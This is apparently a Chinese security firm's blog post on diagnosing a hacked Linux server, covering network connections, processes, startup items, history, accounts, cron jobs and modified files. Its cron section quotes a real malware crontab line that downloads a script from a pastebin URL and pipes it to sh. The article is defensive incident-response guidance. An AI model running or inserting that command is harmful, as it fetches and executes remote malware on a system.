服務器被攻擊怎麼處理

不少客戶網站服務器被入侵，被攻擊，找到咱們SINE安全公司尋求技術支持與幫助，有些網站被篡改，被跳轉，首頁內容被替換，服務器植入木馬後門，服務器卡頓，服務器異常網絡鏈接，有的客戶使用的是阿里雲服務器，常常被提醒服務器有挖礦程序，以及網站被上傳webshell的安全提醒，包括騰訊雲提示服務器有木馬文件，客戶網站被攻擊的第一時間，是須要當即處理的，降損失降到最低，讓網站恢復正常的訪問，因爲每一個客戶找到咱們SINE安全都是比較着急的，安全的處理時間也須要儘快的處理，根據咱們的處理經驗，咱們總結了一些服務器被攻擊，被黑的排查辦法，專門用來檢查服務器第一時間的安全問題，看發生在哪裏，服務器是否被黑，是否被攻擊，那些被篡改等等。

如何排查服務器被攻擊？

首先咱們會對當前服務器的IP，以及IP的地址，linux服務器名稱，服務器的版本是centos,仍是redhat，服務器的當前時間，進行收集並記錄到一個txt文檔裏，接下來再執行下一步，對當前服務器的異常網絡鏈接以及異常的系統進程檢查，主要是經過netstat -an以及-antp命令來檢查服務器存在哪些異常的IP鏈接。並對鏈接的IP，進行歸屬地查詢，若是是國外的IP，直接記錄當前進程的PID值，並自動將PID的全部信息記錄，查詢PID所在的linux文件地址，緊接着檢查當前佔用CPU大於百分之30的進程，並檢查該進程所在的文件夾。

在咱們處理客戶服務器被攻擊的時候發現不少服務器的命令被篡改，好比正常的PS查看進程的，查詢目錄的 cd的命令都給篡改了，讓服務器沒法正常使用命令，檢查服務器安全形成了困擾。對服務器的啓動項進行檢查，有些服務器被植入木馬後門，即便重啓服務器也仍是被攻擊，木馬會自動的啓動，檢查linux的init.d的文件夾裏是否有多餘的啓動文件，也能夠檢查時間，來判斷啓動項是否有問題。

再一個要檢查的地方是服務器的歷史命令，history不少服務器被黑都會留下痕跡，好比SSH登陸服務器後，攻擊者對服務器進行了操做，執行了那些惡意命令均可以經過history查詢的到，有沒有使用wget命令下載木馬，或者執行SH文件。檢查服務器的全部帳號，以及當前使用並登陸的管理員帳戶，tty是本地用戶登陸，pst是遠程鏈接的用戶登陸，來排查服務器是否被黑，被攻擊，也能夠檢查login.defs文件的uid值，判斷uid的passwd來獲取最近新建的管理員帳戶。執行cat etc/passwd命令檢查是否存在異常的用戶帳戶，包括特權帳戶，UID值爲0.

最重要的是檢查服務器的定時任務，前段時間某網站客戶中了挖礦病毒，一直佔用CPU，查看了定時任務發現每15分鐘自動執行下載命令，crontab -l */15 * * * * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q-O- https://pastebin.com/raw/TS4NeUnd)|sh 代碼如上，自動下載並執行SH木馬文件。定時任務刪都刪不掉，最後經過檢查系統文件查到了木馬，並終止進程，強制刪除。有些服務器被黑後，請當即檢查2天裏被修改的文件，能夠經過find命令去檢查全部的文件，看是否有木馬後門文件，若是有能夠肯定服務器被黑了。

以上就是服務器被入侵攻擊的檢查辦法，經過咱們SINE安全給出的檢查步驟，挨個去檢查，就會發現出問題，最重要的是要檢查日誌，對這些日誌要仔細的檢查，哪怕一個特徵都會致使服務器陷入被黑，被攻擊的狀態，也但願咱們的分享可以幫助到更多須要幫助的人，服務器安全了，帶來的也是整個互聯網的安全。